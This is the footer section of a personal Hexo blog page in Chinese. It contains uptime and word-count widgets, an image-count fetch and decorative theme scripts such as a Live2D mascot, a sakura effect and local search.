b=document.getElementById("busuanzi_container_"+a);b&&(b.style.display="inline")})}};
</script>


<!-- <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
<span class="post-meta-divider">|</span>
<span id="busuanzi_container_site_uv">本站访客数<span id="busuanzi_value_site_uv"></span>人</span> -->


<div>
<span id="timeDate">载入天数...</span><span id="times">载入时分秒...</span>
<script>
    var now = new Date(); 
    function createtime() { 
        var grt= new Date("08/12/2023 00:00:00");//在此处修改你的建站时间
        now.setTime(now.getTime()+250); 
        days = (now - grt ) / 1000 / 60 / 60 / 24; dnum = Math.floor(days); 
        hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum); hnum = Math.floor(hours); 
        if(String(hnum).length ==1 ){hnum = "0" + hnum;} minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum); 
        mnum = Math.floor(minutes); if(String(mnum).length ==1 ){mnum = "0" + mnum;} 
        seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum); 
        snum = Math.round(seconds); if(String(snum).length ==1 ){snum = "0" + snum;} 
        document.getElementById("timeDate").innerHTML = "本站已勉强运行 "+dnum+" 天 "; 
        document.getElementById("times").innerHTML = hnum + " 小时 " + mnum + " 分 " + snum + " 秒"; 
    } 
    setInterval("createtime()",250);
</script>
<br><br>
<span class="num">及辞已经在本站记录了 169k 字</span>
<script>
  document.addEventListener("DOMContentLoaded", function() {
    fetch('/imageCount.json')
      .then(response => response.json())
      .then(data => {
        const imageCount = data.count;
        const imageCountElement = document.getElementById('imageCount');
        imageCountElement.textContent = `共计收录了 ${imageCount} 张图片`;
      })
      .catch(error => {
        console.error('Failed to load image count:', error);
      });
  });
</script>
<br><br>
<span id="imageCount">正在加载图片数目...</span>
</div> </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

<!-- hexo injector body_end start --><script src="/assets/mmedia/mmedia-loader.js"></script><!-- hexo injector body_end end --><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/ni-j.model.json"},"display":{"position":"left","width":260,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
   </html>

<!-- 雪花特效 -->
<!-- 直接引用公网CDN在线文件 -->
<!-- <script src="https://cdn.jsdelivr.net/gh/wallleap/cdn/js/xuehuapiaoluo.js">-->
<!-- 引用本地文件 -->
<!--<script type="text/javascript" src="\js\snow.js"></script>-->

<!-- 樱花花特效 -->
<!-- 直接引用公网CDN在线文件 -->
<!--<script src="https://cdn.jsdelivr.net/gh/wallleap/cdn/js/sakura.js"></script>-->
<!-- 引用本地文件 -->
<script type="text/javascript" src="\js\sakura.js"></script>


<!-- 数字雨 
<canvas id="canvas" width="1440" height="900" ></canvas>
<script type="text/javascript" src="/js/DigitalRain.js"></script>-->

<!--单击显示文字-->
<script type="text/javascript" src="/js/click_show_text.js"></script>

<!--图片预加载-->
<script src="//instant.page/3.0.0" type="module" defer integrity="sha384-OeDn4XE77tdHo8pGtE1apMPmAipjoxUQ++eeJa6EtJCfHlvijigWiJpD7VDPWXV1"></script>

<!--字体真棒图标-->
<script type="text/javascript" src="/js/fontawesome_715cc194ca.js"></script>
